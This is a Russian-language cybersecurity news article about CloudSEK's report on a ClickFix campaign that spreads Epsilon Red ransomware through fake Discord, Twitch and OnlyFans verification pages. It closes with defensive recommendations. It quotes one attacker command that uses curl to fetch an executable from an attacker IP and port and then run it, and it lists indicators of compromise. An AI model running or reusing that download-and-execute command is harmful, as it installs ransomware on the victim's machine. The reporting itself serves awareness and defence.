Страницы OnlyFans и Discord ClickFix распространяют вирус-вымогатель Epsilon Red

Новая сложная кампания по распространению вирусов-вымогателей активно обманывает интернет-пользователей по всему миру, используя поддельные страницы верификации для распространения опасной угрозы под названием вредоносное ПО Epsilon Red.

Этот критически важный вывод содержится в последнем отчёте CloudSEK, ведущей компании в области кибербезопасности, об угрозах. Продолжающаяся кампания, впервые замеченная в июле 2025 года, использует социальную инженерию: злоумышленники выдают себя за популярные онлайн-сервисы, такие как Discord , Twitch и OnlyFans . Они обманным путём заставляют пользователей загружать вредоносные файлы .HTA , представляющие собой специальные HTML-приложения, которые могут запускать скрипты непосредственно на компьютере.

По данным CloudSec, когда жертва попадает на одну из поддельных страниц проверки ClickFix и взаимодействует с ней, вредоносные команды запускаются в фоновом режиме без ее ведома.

Это происходит через злоупотребление ActiveX — технологией, позволяющей отображать интерактивный контент в веб-браузерах. В ходе этой атаки вредоносный скрипт незаметно загружает и запускает программу-вымогатель Epsilon Red из скрытого расположения, обходя стандартные проверки безопасности.

Анализ CloudSEK, предоставленный Hackread.com, выявил команды curl -s -o a.exe http://155.94.155227:2269/dw/vir.exe && a.exe , которые загружают и запускают программу-вымогатель, не показывая пользователю типичного окна загрузки.

Затем отображается поддельное сообщение о проверке, которое вводит пользователя в заблуждение, заставляя его думать, что всё в порядке. Примечательно, что в поддельном сообщении есть небольшая опечатка «Verificatification» («Проверка»), которая может быть намеренной деталью, чтобы не вызывать подозрений.

Команда TRIAD компании CloudSEK, ответственная за это открытие, отметила, что в отличие от старых версий подобных атак, которые просто копировали вредоносные команды в буфер обмена, этот новый вариант перенаправляет жертв на вторую страницу, где заражение происходит без какого-либо четкого предупреждения.

Инфраструктура, поддерживающая эту кампанию, включает несколько поддельных доменов и IP-адресов, имитирующих легитимные сервисы, включая поддельного бота Discord Captcha. Также были обнаружены несколько страниц знакомств и романтических тем. Кроме того, с этой кампанией была связана другая вредоносная программа, Quasar RAT , что указывает на потенциальную возможность удалённого управления с помощью программ-вымогателей.

Вирус-вымогатель Epsilon Red, впервые обнаруженный в 2021 году, оставляет записки с требованием выкупа, которые немного напоминают записки от известного вируса-вымогателя REvil , хотя в остальном эти два вируса работают по-разному. Это подчёркивает тенденцию, когда разные группы вирусов-вымогателей заимствуют элементы друг у друга.

Для защиты от этой новой угрозы CloudSEK рекомендует несколько ключевых шагов. Пользователям следует отключить ActiveX и Windows Script Host (WSH) в настройках своего компьютера, чтобы заблокировать выполнение подобных скриптов. Организациям также следует использовать каналы аналитики угроз для немедленной блокировки известных IP-адресов и доменов злоумышленников, таких как twtichcc и 155.94.155227:2269 .

Кроме того, инструменты безопасности конечных точек должны быть настроены на обнаружение необычной скрытой активности, например, программ, запускаемых в фоновом режиме из веб-браузеров. Наконец, критически важно постоянное обучение по вопросам безопасности, позволяющее пользователям распознавать и избегать поддельных страниц верификации и попыток социальной инженерии , даже если они выдают себя за знакомые онлайн-платформы.